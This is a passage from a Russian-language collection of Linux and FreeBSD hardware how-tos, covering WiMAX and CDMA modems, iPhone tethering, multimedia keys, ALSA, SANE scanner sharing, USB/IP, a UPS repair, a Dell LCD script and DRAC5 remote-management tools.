-70 26 1 01:01:00:00:02:00:17:20 0x05 3426.000 10.000 -76 17 2 01:01:00:00:02:00:17:10 0x05 3436.000 10.000 -74 20 3 01:01:00:00:02:00:17:30 0x05 3446.000 10.000 -72 24 Подключаемся к той, у которой соотношение сигнал/шум максимальное, в данном случае 0 > connect 0 и если параметры аутентификации заданы верно, соединение будет установлено, а светодиод модема сменится на зеленый с мигающим желтым. В консоли демона можно увидеть такую информацию: =============== Received Message Start (2010/09/24 18:03:10.622) =========== u32State = Network Entry completed Service flow response received (Type = 6 - Subtype = 1 - Length = 8476) Service Flow Add Indication: Type = 13 Direction = Uplink Connection ID = 10039 Virtual CID = 4 Service flow ID = 513 Max sustained rate = 512 kbps Traffic priority = 0 =============== Received Message End (type=6 sub-type=1) =============== Device status indication: Layer 2 connected =============== Received Message Start (2010/09/24 18:03:10.682) =========== u32State = Network Entry completed Service flow response received (Type = 6 - Subtype = 1 - Length = 8476) Service Flow Add Indication: Type = 13 Direction = Downlink Connection ID = 10040 Virtual CID = 5 Service flow ID = 512 Max sustained rate = 2680 kbps Traffic priority = 0 ================ Link status = LINKUP ACHIEVED Здесь видны параметры скорости даунлинка/аплинка (2680/512 kbps - ограничение провайдера). Если соединение не установилось - нужно смотреть вывод ошибок в консоли демона и пытаться исправить. Также будет полезно включить опции AuthLog и просмотреть детальный лог. Вполне вероятно, для других провайдеров параметры аутентицикации будут совсем другие. 7. Финальные шаги После того, как все будет правильно настроено - демон можно запустить в фоне: wimaxd -c /etc/wimaxd.conf и занести в стартовые скрипты системы. Клиентскую часть тоже можно автоматизировать, в документации есть пример скрипта на Python. Но я не силен в программировании на Python, поэтому оставляю это за рамками статьи. Осталось настроить PPPoE-соединение к провайдеру. Тут уже все стандартно - запускаем pppoeconf и отвечаем на вопросы. Обратите внимание, что интерфейс eth1 изначально не поднят, перед запуском PPPoE его нужно активировать (ifconfig eth1 up) Стартуем: pon dsl-provider ... и вуаля! Проверяем, поднялся ли ppp0: ifconfig ppp0 ping ftp.mgts.by --- ftp.mgts.by ping statistics --- 177 packets transmitted, 177 received, 0% packet loss, time 176214ms rtt min/avg/max/mdev = 42.551/59.213/71.809/8.631 ms Работает все хорошо, проблем замечено не было. Скорость - максимальная, ограниченная провайдером. Субъективно, пинг стал меньше и ровнее, чем под Windows. При подготовке статьи была использована документация из Sprint 4G Depelopment Pack. P.S. Выражаю благодарность человеку под ником amod-cccp за предоставленный линк на этот пак (месяц назад искал какую-либо информацию - ничего не нашел).

Использование iPhone как USB-модема в Ubuntu (доп. ссылка 1) Автор: Юрий Евстигнеев [комментарии]

Для настройки работу iPhone в качестве модема через USB, необходимо установить свежие версии libimobiledevice, ipheth (iPhone USB Ethernet Driver) и gvfs из PPA-репозитория pmcenery: sudo add-apt-repository ppa:pmcenery/ppa sudo aptitude update sudo aptitude install libimobiledevice libimobiledevice-utils ipheth-utils gvfs Включаем на телефоне режим модема. Подключаем телефон через USB и настраиваем соединение в NetworkManager.

Подключение мультимедиа клавиш на usb-клавиатуре во FreeBSD (доп. ссылка 1) Автор: arachnid [комментарии]

Условие - FreeBSD не ниже 8-ки. Мультимедиа клавиши usb-шных клавиатур не генерируют фиксированные скан-коды, поэтому этим придется заняться uhidd. Необходимо установить /usr/ports/sysutils/uhidd для того, что бы связать клавиши со скан-кодами, сначала запустим uhidd следующим образом: uhidd -o /dev/ugenX.X где параметр "-о" значит, что обслуживать демон будет только мультимедиа-клавиши, а номера в ugen должны ссылаться на клавиатуру. Запускаем usbconfig и смотрим вывод После запуска последовательно нажимаем все мультимедиа кнопки. на какие-то может быть реакция, на какие-то нет - пока неважно - главное последовательно пройтись по всем кнопкам. в результате этого мы получим файл /var/run/uhidd.ugenX.X/cc_keymap следующего вида 0x046d:0xc30e={ cc_keymap={ Play/Pause="0x5A" Mute="0x5F" Volume_Increment="0x62" Volume_Decrement="0x63" AL_Consumer_Control_Configuration="0x71" AC_Home="0x66" } } где первыми идет обозначение клавиатуры (вендор:модель), а затем названия кнопок с произвольно присвоенными скан-кодами. и вот здесь есть одна хитрость - uhidd выбирает эти коды из списка свободных (посмотреть список можно в конце man uhidd.conf), но может так получиться, что какие-то коды уже заняты. в таком случае для этих клавиш надо прописать коды самостоятельно, но об этом чуть позже. Далее создаем файл /usr/local/etc/uhidd.conf default={ mouse_attach="NO" kbd_attach="NO" vhid_attach="NO" cc_attach="YES" } повторяющий ту же опцию "-o", которую указывали при запуске вручную теперь cat /var/run/uhidd.ugenX.X/cc_keymap >> /usr/local/etc/uhidd.conf и делаем /usr/local/etc/rc.d/uhidd start /dev/ugenX.X и настраиваем свой DE. правда здесь может поджидать маленькая досада - поскольку uhidd назначает скан-коды произвольно из списка неиспользуемых, то у меня получилось, что скан-код с одной из клавиш не обрабатывался. В этом случае просто назначаем клавише другой скан-код из доступных. в случае, если window manager не поддерживает назначения произвольных сканкодов на нажатия, а обрабатывает только стандартные, тогда надо использовать xmodmap .Xmodmap где в .Xmodmap keycode 170 = XF86AudioRaiseVolume keycode 184 = XF86AudioLowerVolume keycode 190 = XF86AudioMute ...... Ссылки на использованные материалы: * http://wiki.freebsd.org/uhidd#head-629d89bc56c27990a707d46a32462dcdbdd3ccf7 * man uhidd * man uhidd.conf

Подключение нескольких звуковых плат через ALSA (доп. ссылка 1) (доп. ссылка 2) Автор: Max Tyslenko [комментарии]

При наличии в системе 2 звуковых плат, встроенной и внешней, Kubuntu по умолчанию для работы выбрала встроенную. Переключить вывод на внешнюю карту можно через GUI-конфигуратор "Параметры системы" / "Мультимедиа", но интерес представляет способ изменения активной карты из консоли. В помощь нам придет утилита: asoundconf $ asoundconf Usage: asoundconf is-active asoundconf get|delete PARAMETER asoundconf set PARAMETER VALUE asoundconf list Convenience macro functions: asoundconf set-default-card PARAMETER asoundconf reset-default-card asoundconf set-pulseaudio asoundconf unset-pulseaudio asoundconf set-oss PARAMETER asoundconf unset-oss Для переключения активной карты воспользуемся командой: $ asoundconf set-default-card PARAMETER Вместо параметра PARAMETER нужно указать имя звуковой карты, узнать которое можно через команду: $ asoundconf list Names of available sound cards: NVidia Intel В итоге выполняем: asoundconf set-default-card NVidia Второй способ - внести изменения в файл конфигурации ~/.asoundrc (локальный для пользователя) или /etc/asound.conf, в котором прописать: pcm.!default { type hw card NVidia } идентификатор карты можно посмотреть выполнив: cat /proc/asound/cards Дополнительно можно указать параметр "device", в котором привести номер устройства вывода (колонки, наушники и т.п.). Список устройств можно посмотреть через команду: cat /proc/asound/devices Прослушать заданный файл через определенное устройство можно, например, так: aplay -D hw:0,2 file.wav так aplay -D plughw:0,0 file.wav или так mplayer file.wav -ao alsa:device=hw=0.0

Организация совместного доступа к сканеру по сети (доп. ссылка 1) Автор: Роман Сукочев [комментарии]

Задача: организовать совместный доступ пользователей с разных машин локальной сети к сканеру HP Scanjet G3110, подключенному к ПК с Ubuntu Linux. Настройка сервера к которому подключен сканер: 1. Устанавливаем пакет 'sane-utils': sudo apt-get install sane-utils 2. Добавляем в файл конфигурации /etc/sane.d/saned.conf IP-адреса компьютеров, которым необходимо открыть доступ к сканеру. 3. В файл /etc/inetd.conf, при использовании в Ubuntu openbsd-inetd, добавляем или раскомментируем строку: sane-port stream tcp nowait saned:saned /usr/sbin/saned saned Если используется xinetd, настраиваем вызов saned по аналогии. 4. Создаем группу scanner: sudo groupadd scanner добавляем себя и пользователя saned в эту группу: sudo usermod -aG scanner $USER sudo usermod -aG scanner saned 5. Для организации доступа к сканеру из группы scanner редактируем файл /lib/udev/rules.d/40-libsane.rules ищем там свой сканер. Выглядеть его упоминание может примерно так: # Hewlett-Packard ScanJet G3110 ATTRS{idVendor}=="03f0", ATTRS{idProduct}=="4305", ENV{libsane_matched}="yes" приводим строку к такому виду: # Hewlett-Packard ScanJet G3110 ATTRS{idVendor}=="03f0", ATTRS{idProduct}=="4305", ENV{libsane_matched}="yes", MODE="664", GROUP="scanner" Если сканера нет в списке, его нужно добавить по аналогии с остальными сканерами. idVendor и idProduct сканера можно узнать с помощью команды: sane-find-scanner 6. Перезагружаем компьютер для того чтобы удостовериться, что после перезагрузки все заработает как надо, или вручную перезапускаем сервисы saned, udev, openbsd-inetd (или xinetd). Настройка клиентской машины 1. Устанавливаем пакет sane-utils: sudo apt-get install sane-utils 2. В конец файла /etc/sane.d/net.conf добавляем IP-адрес сервера к которому подключен сканер. 3. Теперь можно пробовать сканировать с помощью XSane или другой подходящей программой, используя расшаренный сканер. На ПК, работающих под Windows, для работы с Sane-сервером можно использовать такие клиенты, как XSane-win32 (http://www.xsane.org/xsane-win32.html) или SaneTwain (http://sanetwain.ozuzo.net/), для Mac OS X - Twain-sane (http://www.ellert.se/twain-sane/). Для организации сканирования на стороне клиента через web-браузер можно использовать проект PHPSane (http://sourceforge.net/projects/phpsane/).

Настройка работы CDMA модема через /dev/ttyACM0 Автор: Игорь Гаркуша [комментарии]

Окружение ОС - Fedora 11 (Russian Remix). Ядро 2.6.29.4-167.fc11.i686.PAE. Mодем Maxon Minimax MM-5500U (CDC ACM модем). Файлы /etc/wvdial.conf, /etc/resolv.conf настроены верно. Используется верно настроенная программа дозвона chestnut-dialer (вер. 0.3.3) (хотя можно и без нее если установлен wvdial). Ситуация 1. Загружается ОС. Модем отключен. Затем модем включается и дозвон невозможен, поскольку отсутствует файл устройства /dev/ttyACM0. Мониторинг командой udevadm monitor показывает, что его удаляет ядро и затем Udev. Ситуация 2. Загружается ОС. Модем включен. Дозвон возможен (файл устройства /dev/ttyACM0 существует). Модем отключается - файл устройства /dev/ttyACM0 пропадает. При повторном включении модема файл устройства отсутствует. В итоге дозвон невозможен. Решение. Подобные ситуации возникали, в частности, и в Ubuntu 9.10 и в некоторых других Linux. Из форумов видно, что проблему рекомендуют решать перезагрузкой модуля ядра cdc-acm и созданием файла устройства в командном режиме. Рекомендуют также автоматизацию при помощи правил udev. Возможна даже ситуация когда имеем после нескольких plug/unplug модема множество /dev/ttyACM0..n. И модем не распознается. Правила udev помогают не всегда (установлено экспериментально). Связь с модемом можно установить и при помощи представленной ниже специально разработанной программы (тестировалась на Fedora 11 Russian Remix) и Ubuntu 9.10 (версии udev 141 и 147 соответственно). // File minimaxd.c // #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <signal.h> #include <syslog.h> #define TMP_FILE__PID "/tmp/minimaxd.pid" #define TMP_FILE__LSUSB "/tmp/lsusbminimax.tmp" #define PATH_CDC_ACM_MODULE "/sys/module/cdc_acm/initstate" #define PATH_MODEM_TTY "/dev/ttyACM0" #define CHECK_MODEM_PLUG_STR "lsusb | grep Qualcomm > /tmp/lsusbminimax.tmp" int fileexist(const char* filename); void kill_copy_daemon(); void start_restart(); void stop(); int CheckPlugModem(); void wait_cdc_acm_control(); int CheckPid(); void SetPid(); int GetPid(); void PrintMessageToLog(char* szMessage); int main(int argc, char* argv[]) { if(argc==2) { if((!strcmp("start",argv[1]))||(!strcmp("restart",argv[1]))) { kill_copy_daemon(); wait_cdc_acm_control(); } else if(!strcmp("stop",argv[1])) kill_copy_daemon(); } else { printf("Start/Restart MiniMax Modem Access:\nminimaxd start|stop|restart\n"); printf("Background start:\nminimaxd start &\n"); } return 0; } int fileexist(const char* filename) { int res = 0; FILE* f=fopen(filename,"rt"); if(f!=NULL) { fclose(f); res=1; } return res; } void kill_copy_daemon() { char cmd[255]=""; int pid = GetPid(); if(pid>0) { kill((pid_t)(pid), SIGKILL); strcpy(cmd,"rm -f "); strcat(cmd,TMP_FILE__PID); system(cmd); strcpy(cmd,"rm -f "); strcat(cmd,TMP_FILE__LSUSB); system(cmd); PrintMessageToLog("Modem service is stopped"); } } void start_restart() { system("rm -f /dev/modem"); system("rm -f /dev/ttyACM*"); system("rmmod cdc-acm"); system("modprobe cdc-acm"); system("mknod /dev/ttyACM0 c 166 0"); system("chmod 666 /dev/ttyACM*"); system("ln -s /dev/ttyACM0 /dev/modem"); PrintMessageToLog("Modem service started"); } void stop() { system("rmmod cdc-acm"); system("rm -f /dev/modem"); system("rm -f /dev/ttyACM*"); PrintMessageToLog("Modem service is stopped"); } int CheckPlugModem() { char str[255]=""; int res = 0; system(CHECK_MODEM_PLUG_STR); sleep(2); FILE* f=fopen(TMP_FILE__LSUSB,"rt"); if(f!=NULL) { strcpy(str,""); fscanf(f,"%s",str); fclose(f); if(strlen(str)>0) res = 1; } return res; } void wait_cdc_acm_control() { int fl_CDC_ACM_OK=0; int fl_ttyACM0_OK=0; if(!CheckPid()) { SetPid(); while(1) { fl_CDC_ACM_OK=fileexist(PATH_CDC_ACM_MODULE); if(CheckPlugModem()) { fl_ttyACM0_OK=fileexist(PATH_MODEM_TTY); if((fl_CDC_ACM_OK==1)&&(fl_ttyACM0_OK==0)) start_restart(); else if((fl_CDC_ACM_OK==0)&&(fl_ttyACM0_OK==0)) start_restart(); } else { if(fl_CDC_ACM_OK) stop(); } sleep(3); } } } int CheckPid() { return fileexist(TMP_FILE__PID); } void SetPid() { pid_t pid = getpid(); FILE* f=fopen(TMP_FILE__PID,"wt"); if(f!=NULL) { fprintf(f,"%d",pid); fclose(f); } } int GetPid() { int res = 0; FILE* f=fopen(TMP_FILE__PID,"rt"); if(f!=NULL) { fscanf(f,"%d",&res); fclose(f); } else res = -3; return res; } void PrintMessageToLog(char* szMessage) { openlog("MINIMAXD", LOG_ODELAY, LOG_USER); syslog(LOG_INFO, "%s", szMessage); closelog(); } Компиляция командой: gcc ./minimaxd.c -o minimaxd Для 64-разрядной версии: gcc ./minimaxd.c -m64 -o minimaxd Полученный minimaxd копируем в каталог /usr/local/bin/ Назначаем владельцем root. Тестирование. Запуск программы из коммандной строки выполняем так: # minimaxd start или в фоне: # minimaxd start & Подключаем модем к usb-порту, ждем инициализации около 5 сек. Затем пробуем дозвон. Прерываем дозвон. Отсоединяем модем, подсоединяем заново и через 5 сек. повторяем процедуру. Если все Ok, то завершаем процедуру тестирования. Для завершения работы minimaxd, работающей в фоне, в другой консоли выполняем: # minimaxd stop Запуск при загрузке ОС. В каталоге /etc/rc.d/init.d создаем упрощенный скрипт (файл minimaxdaemon) для менеджмента "демона": #!/bin/sh # startup script for Minimax daemon (/usr/local/bin/minimaxd) DAEMON=/usr/local/bin/minimaxd minimaxdaemon_start () { echo -n "Starting ${DAEMON}: " ${DAEMON} start & } minimaxdaemon_stop () { echo -n "Shutting down ${DAEMON}: " ${DAEMON} stop } minimaxdaemon_restart () { echo -n "Restarting ${DAEMON}: " ${DAEMON} restart & } case $1 in start) minimaxdaemon_start ;; stop) minimaxdaemon_stop ;; status) echo "${DAEMON}:" `pidof ${DAEMON}` ;; restart) minimaxdaemon_restart ;; *) echo "Usage: minimaxdaemon {start|stop|restart|status}" exit 1 ;; esac exit 0 Создаем на minimaxdaemon символические ссылки в каталогах rc?.d. Например, для Fedora 11 (Russion Remix): ln -s /etc/rc.d/init.d/minimaxdaemon /etc/rc.d/rc0.d/K01minimaxdaemon ln -s /etc/rc.d/init.d/minimaxdaemon /etc/rc.d/rc6.d/K01minimaxdaemon ln -s /etc/rc.d/init.d/minimaxdaemon /etc/rc.d/rc5.d/S96minimaxdaemon Теперь можно проверить работу minimaxd после перезагрузки. Заключение Следует отметить, что это все верно в случае, если в ядре существует поддержка модуля cdc-acm. Задержки (функции sleep) могут быть выбраны иные. Пример можно рассматривать и для других подобных модемов, работающих через cdc-acm-модуль и использующих /dev/ttyACM0-файл. Однако, надо учесть, что для определения в системе модема используется команда lsusb и в данном случае она в программе такая: lsusb | grep Qualcomm > /tmp/lsusbminimax.tmp Т.е. подразумевается, что модем определяется, например, как: Bus 009 Device 003: ID 05c6:3196 Qualcomm, Inc. CDMA Wireless Modem Поэтому в программе и фильтруем по слову "Qualcomm". В случае других производителей управляющую команду надо будет изменить.

Подключение удалённых USB устройств в Linux Автор: pavlinux [комментарии]

Есть много причин использования физически удаленных USB устройств, именно устройств, а не их ресурсов или данных передаваемых с них. То есть, после прочтения и настройки данного ПО, вы сможете подключать флешки, камеры, принтеры, и т.п., находящиеся скажем в Австралии или дома, находясь на работе. О наличии или отсутствии модулей поддержки USB_IP в определенных дистрибутивах ничего сказать немогу, но вы сами можете прекрасно проверить командой: # modprobe -l | grep usbip /lib/modules/2.6.31.2/kernel/drivers/staging/usbip/vhci-hcd.ko /lib/modules/2.6.31.2/kernel/drivers/staging/usbip/usbip.ko Если появилось, что-то вроде этого, то переходим ко второй части, нет, - поехали дальше. 1. Установка поддержки USB/IP в ядре. Для работы необходимо ядро версии не менее чем 2.6.20, после версии 2.6.28 этот проект перенесён в основную ветку ядра, но в раздел staging (по-русски - "почти работающие" :)) Итак, если версия 2.6.28 и больше, запускаем конфигурацию ядра: # make menuconfig Идем в раздел: Device Drivers ---> Staging drivers ---> И включаем опции: (лучше как модули) <M> USB IP support (EXPERIMENTAL) <M> USB IP client driver <M> USB IP host driver Сохраняем конфигурацию, компилируем и устанавливаем ядро. # make && make modules_install && make install; 2. Установка утилит пользовательского режима. Для управлением и подключением наших устройств необходимы утилиты пользовательского режима и некоторые библиотеки, а именно: - sysfsutils >= 2.0.0 sysfsutils library А для компиляции: - libwrap0-dev tcp wrapper library (можно и без неё) - gcc >= 4.0 - libglib2.0-dev >= 2.6.0 - libtool, automake >= 1.9, autoconf >= 2.5.0, pkg-config Скачиваем архив с Sourceforge (я бы этого не делал) http://sourceforge.net/projects/usbip/files/ Либо последние версии, через SVN: # cd /usr/src/ # svn co https://usbip.svn.sourceforge.net/svnroot/usbip usbip Переходим в каталог с утилитами, запускаем autogen.sh, после чего должен появится configure # cd usbip/linux/truck/src/ # ./autogen.sh configure лучше указать где находится файл описания производителей USB устройств - usb.ids, если этого не сделать, то ничего страшного, он установит свой в /usr/local/share/usbip/usb.ids :) # ./configure --with-usbids-dir=/usr/share # make # make install У вас должны появится три утилитки - usbip, usbipd, usbip_bind_driver и две библиотеки - libusbip.so.0.0.1 и libusbip.a 3. Подключение и работа. Как при любом взаимодействии, так и у нас необходимы как минимум два индивида. :) В USB/IP они подразделяются на клиентскую и серверную части процесса работы. SERVER - это компьютер с физическим, необходимым нам устройством. CLIENT - так же, компьютер, возможно даже тот же, где работает сервер (сейчас всех запутаю). 3.1 Серверная часть. И так, чтобы получить доступ по сети, скажем к флешке на компьютере с именем [SERVER], необходимо: [SERVER] 1. Физически подключить устройство. 2. Загрузить модули: # modprobe -v usbip_common_mod # modprobe -v usbip 3. Запустить сервер сетевых подключений # usbipd -D Должен открыться TCP порт 3240, и находиться в состоянии LISTEN # netstat -ltn; Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:3240 0.0.0.0:* LISTEN 4. Вывести список устройств возможных для подключения # usbip_bind_driver --list List USB devices - busid 2-1 (051d:0002) 2-1:1.0 -> usbhid - busid 1-8 (058f:6387) 1-8:1.0 -> usb-storage 5. И наконец, сделать устройство доступным для клиентов. # usbip_bind_driver --usbip 1-8 usbip_bind_driver --usbip 1-8 ** (process:12829): DEBUG: 1-8:1.0 -> usb-storage ** (process:12829): DEBUG: unbinding interface ** (process:12829): DEBUG: write "add 1-8" to /sys/bus/usb/drivers/usbip/match_busid ** Message: bind 1-8 to usbip, complete! 3.2 Клиентская часть. [CLIENT] 1. Устанавливаем модули # modprobe -v usbip_common_mod # modprobe -v vhci-hcd Проверяем dmesg # dmesg vhci_hcd vhci_hcd: USB/IP Virtual Host Contoroller vhci_hcd vhci_hcd: new USB bus registered, assigned bus number 3 usb usb3: New USB device found, idVendor=1d6b, idProduct=0002 usb usb3: New USB device strings: Mfr=3, Product=2, SerialNumber=1 usb usb3: Product: USB/IP Virtual Host Contoroller usb usb3: Manufacturer: Linux 2.6.31.2 vhci_hcd usb usb3: SerialNumber: vhci_hcd Всё в порядке, идем дальше... 2. Выводим список устройств доступных на сервере, у которого адрес 192.168.0.1 # usbip --list 192.168.0.1 - 192.168.0.1 1-8: Alcor Micro Corp. : Transcend JetFlash Flash Drive (058f:6387) : /sys/devices/pci0000:00/0000:00:02.1/usb1/1-8 : (Defined at Interface level) (00/00/00) : 0 - Mass Storage / SCSI / Bulk (Zip) (08/06/50) Чудненько, мы видим удалённую флешку.... 3. И подключаем её как будто бы локальную # usbip --attach 192.168.0.1 1-8 Проверяем состояние # usbip --port # lsusb # dmesg Если у Вас работает какая либо система автоподключения, наверно флещка уже куда-то подмонтировалась. Далее можно производить любые действия, так как вы работаете с обычными USB устройствами, - снимать, сканировать, печатать. 4. Отключение устроиства на клиенте # usbip --detach 1-8 P.S. Драйвер находиться в стадии глубокого эксперимента, так что ошибок очень много. Так например временное пропадание соединения, для TCP/IP явление нормальное, а вот временное пропадание USB устройства, приводит к его уничтожению из списка устройств. А после прохождения таймаута в TCP, устройство вдруг возвращается... :) В VHCI драйвере это конечно компенсируют, но так же есть пределы таймаутов. Так что, хорошо настроенная сеть, пускай даже и медленная, залог успеха. Про отключение режимов управлением питанием, понижение частоты, QoS, молчу - просто обязательно!

Исправляем неисправный Smart UPS собственными силами Автор: urri [комментарии]

Была проблема: После замены аккумуляторов в smart-ups 1500 при подключении к сети ~220 УПС издал непрерывный сигнал и ни на что не реагировал. Замена С65 100х35v (электролит высох) на 100х63v решила проблему. Ищите сухие ёмкости , в них 75% неисправности электроники.

Вывод произвольного текста на LCD у серверов Dell 1950 Автор: rstone [комментарии]

Подразумевается что ipmitool установлен, загружены и работают модули Linux ядра ipmi_devintf ipmi_si ipmi_msghandler Для проверки можно выполнить : # ipmitool chassis status System Power : on Power Overload : false Power Interlock : inactive Main Power Fault : false ... У Вас сообщения могут быть другими, но не суть важно, важен факт что команда работает. По умолчанию этот скрипт будет выводить "имя сервера" на LCD экран: #!/usr/bin/perl use warnings ; use strict ; my $DEBUG = 0 ; my $name = qx {hostname} ; chomp $name ; $name = (split(/\./,$name))[0]; my @letters = split(//,$name); my $length = scalar @letters ; if ( $length < 1 ) { print "Hostname not found\n" ; exit 1 ; } my $string ; foreach my $letter ( @letters) { my $h = ord($letter); my $hexval = sprintf("0x%x ", $h); $string .=$hexval ; } print "string $string of length $length\n" if $DEBUG ; my $out = qx {ipmitool raw 0x6 0x58 193 0 0 $length $string}; print "Output [$out]" if $DEBUG ; $out = qx {ipmitool raw 0x6 0x58 194 0}; print $out if $DEBUG ;

Использование контроллера DRAC 5 в Linux (доп. ссылка 1) Автор: Alex Samorukov [комментарии]

Для удаленного доступа на сервера Dell был установлен контроллер "Dell Remote Access Controller 5" (DRAC5). Это специализированное (его можно установить только на некоторые сервера Dell) аппаратное решение для удаленного доступа (KVM), мониторинга (используется IPMI контроллер) и удаленного управления питанием и монтирования CD/Floppy устройств по сети. В процессе работы с устройством я столкнулся с некоторыми сложностями, решив которые я и решил написать эту заметку. Что представляет из себя DRAC5? После того как контроллер установлен и настроен (из внутреннего BIOS) к нему можно подключиться по https или ssh. Большинство действий, такие как мониторинг, перезагрузка или управление питанием, настройки доступа и уведомлений не требуют какого либо специального ПО. Но 2 самые важные (на мой взгляд) функции - KVM и удаленное монтирование, сразу не заработали, так как требовали специального дополнения. О них и заметка. KVM в линукс Несмотря на то, что устройство было куплено совсем недавно в нем была устаревшая прошивка (0.36 при наличии 0.45 на момент написания). В этой прошивке доступ к KVM возможен только с помощью специального дополнения, который доступен для IE (ActiveX) и Firefox Linux. При этом последний работает только в Firefox 2 (используются функции, которые убраны из Firefox 3), установка дополнения нормально не работает (мне пришлось копировать нужные файлы руками). Так как держать FF2 i386 только для kvm мне не хотелось я решил обновить прошивку. Обновление доступно на сайте Dell, в том числе и для Linux версии. Прошивка обновляется без проблем, причем даже без перезагрузки сервера (CentOS 5.3 x86_64). Таже рекомендую обновить прошивку контроллера BMC - без этого у меня были недоступны некоторые пункты меню мониторинга после обновления прошивки DRAC. После обновления появится, во первых, плагин для Linux Firefox 3 i386, а во вторых - java клиент. Java клиент использует технологию Java Web Start (jnlp файлы) и прекрасно работает c SUN JRE в Ubuntu x86_64 (да и думаю в любой другой ОС с javaws). Если у вас не прописана ассоциация для запуска jnlp файла, то просто укажите путь к bin/javaws jre. Клиент по функционалу ничем не отличается от windows или native linux дополнения, так что данная проблема была успешна решена. Удаленное подключение устройств Контроллер позволяет подключать дисковые (CD или Floppy) устройства физически расположенные на машине клиента. Также плата умеет загружаться с созданных виртуальных устройств. Совместно с KVM это позволяет, например, установить операционную систему, или загрузится с Rescue CD для ремонта FS. К сожалению данная возможность также требует наличие плагина, который, в свою очередь, требует Linux Firefox i386. Поиск в интернете подсказал решение - оказывается у Dell есть CLI утилита для данной цели, racvmcli. Возможно она и распространяется на одном из многочисленных дисков, которые шли с сервером, но так как у меня не было к ним доступа - пришлось "выкусывать" с LiveCD. Для этого скачиваем образ omsa-54-040308.iso (http://linux.us.dell.com/files/openmanage-contributions/omsa-54-live/omsa-54-040308.iso) и извлекаем нужные файлы с него (используется sqashfs): # mkdir -p /mnt/cd /mnt/opt $HOME/dell # mount -o loop,ro omsa-54-040308.iso /mnt/cd/ # mount -o loop,ro /mnt/cd/base/opt.mo /mnt/opt # cp /mnt/opt/opt/dell/srvadmin/rac5/bin/* $HOME/dell # umount /mnt/opt && umount /mnt/cd Все, нужные файлы в хомяке, подпапке Dell. Для подключения устройств используется утилита racvmcli root@samm-laptop:~/dell# ./racvmcli racvmcli version 2.1.0 Copyright (c) 2007 Dell, Inc. All Rights Reserved usage: racvmcli -r RAC-IP-addr[:RAC-SSL-port] -u RAC-user -p RAC-user-password -f {floppy-dev | disk-image} -c {cdrom-dev | ISO-image} [-v] # version [-h] # help [-m] # manual page [-e] # use an SSL-encrypted channel Попробуем подключить устройство: root@samm-laptop:~/dell# ./racvmcli -r kvm.example.com -u user -p password -c systemrescuecd-x86-1.1.6.iso racvmcli: connecting(1).. Failed to initialize SSL layer racvmcli: unable to connect to 'kvm.example.com' Первый облом. strace показал что racvmcli пытается через dl() подгружать openssl и не находя нужной версии обламывается. При этом в качестве аргумента к dl() передается поочередно libssl.so.0.9.7,libssl.so.2, libssl.so.4,libssl.so.6, тогда как в Ubuntu установлена libssl.so.0.9.8. Я просто поправил в бинарном редакторе 0.9.7 на 0.9.8 после чего программа успешно заработала. root@samm-laptop:~/dell# ./racvmcli -r kvm.example.com -u user -p password -c systemrescuecd-x86-1.1.6.iso racvmcli: connecting(1).. ..connected to kvm.example.com Что особенно ценно - данная утилита может быть запущена, например, с сервера по соседству для большей скорости передачи. Я загрузился с RescueCD подключенным в Европе (сам сервер был в Америке) и загрузка заняла примерно 10 минут, что тоже приемлемо. Доступ к серверу через SSH Если по каким-то причинам вам удобнее получать доступ к серверу через SSH, то для этого существуют все возможности. По умолчанию на контроллере включен SSH доступ, пользователь и пароль такой же как и на https. После подключения доступны 3 команды (или я только 3 нашел) racadm и smclp и connect. Первая служит для конфигурирования kvm, вторая не совсем понятно для чего, а третья - для подключения к com2 сервера. Настроив agetty и grub/lilo на работу с COM2 (ttyS1), а также прописав в BIOS redirect на Serial Port (указав портом Remote Access Device) мы получаем возможность полноценно управлять сервером с момента начальной загрузки, в том числе менять настройки BIOS и так далее. Для этого в ssh сессии пишем "connect com2" и если все настроено верно - то должно быть приглашение. Параметры порта по умолчанию - 57600 8N1, могут быть изменены через web интерфейс. Удаленное управление настройками DRAC Помимо racvmcli в папке Dell еще находится утилита racadm. Она также желает работать с libssl.so.0.9.7, так что я поступил с ней также как и с racvmcli, пропатчив бинарник. Я уже упоминал, что racadm можно вызывать из ssh, но локальная версия имеет больше возможностей (команды sslcertupload, sslcertdownload, sslkeyupload, usercertupload, krbkeytabupload). Для вызова справки существует команда help ./racadm -r kvm.example.com -u user -p password help Для справке о какой либо команде - help <command> ./racadm -r kvm.example.com -u user -p password help ping Из особенностей можно заметить, что программа позволяет выполнять часть настроек, которые я не нашел в web интерфейсе (например, sslkeyupload). Заключение Контроллер DRAC5 - несомненно крайне полезен для удаленного администрирования, особенно в случае сложных проблем. Приятно что разработчики начинают думать не только о Windows пользователях, и в итоге удалось достичь 100% работоспособности контроллера в Linux. Надеюсь, что ошибки будут учтены, и в следующих версиях сразу появятся нормальные Java CLI/GUI клиенты, а их "добыча" будет более тривиальной. Пропатченные для работы с openssl0.9.8 утилиты можно скачать у меня (http://samm.kiev.ua/drac5/drac5_cli.tar.gz). Надеюсь заметка была полезной для владельцев Dell серверов, в случае вопросов - постараюсь ответить.

Как узнать поддерживается ли PCI устройство в заданном Linux ядре (доп. ссылка 1) [комментарии]

Для определения какие доступные модули ядра подходят для установленных в текущей системе PCI плат, нужно запустить утилиту pcimodules, которая для сопоставления модулей ядра и идентификаторов PCI плат использует содержимое файла /lib/modules/версия_ядра/modules.pcimap, автоматически генерируемого на этапе выполнения команды depmod. Полный список всех поддерживаемых PCI идентификаторов можно найти в файле /usr/share/hwdata/pci.ids Обновить базу pci.ids можно выполнив команду: update-pciids Для просмотра всех PCI устройств в системе нужно использовать утилиту lspci (lspci -vvv для детального вывода). Для вывода информации, какой драйвер можно использовать для каждого устройства в системе: lspci -k Рассмотрим по шагам процесс определения присутствия поддержки имеющейся аудио платы в текущем Linux ядре. Смотрим параметры платы: lspci | grep -i audio 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller Видим, что идентификатор платы 00:1b.0. Далее, выводим для этого идентификатора более подробную информацию: lspci -n | grep 00:1b.0 00:1b.0 0403: 8086:27d8 (rev 01) где, 00:1b.0 - код устройства; 8086 - код производителя (Intel Corporation) 27d8 - идентификатор модели. Проверяем какие модули ядра поддерживают данную модель: grep 27d8 /lib/modules/$(uname -r)/modules.pcimap snd-hda-intel 0x00008086 0x000027d8... Смотрим информацию о драйвере: modinfo snd-hda-intel filename: 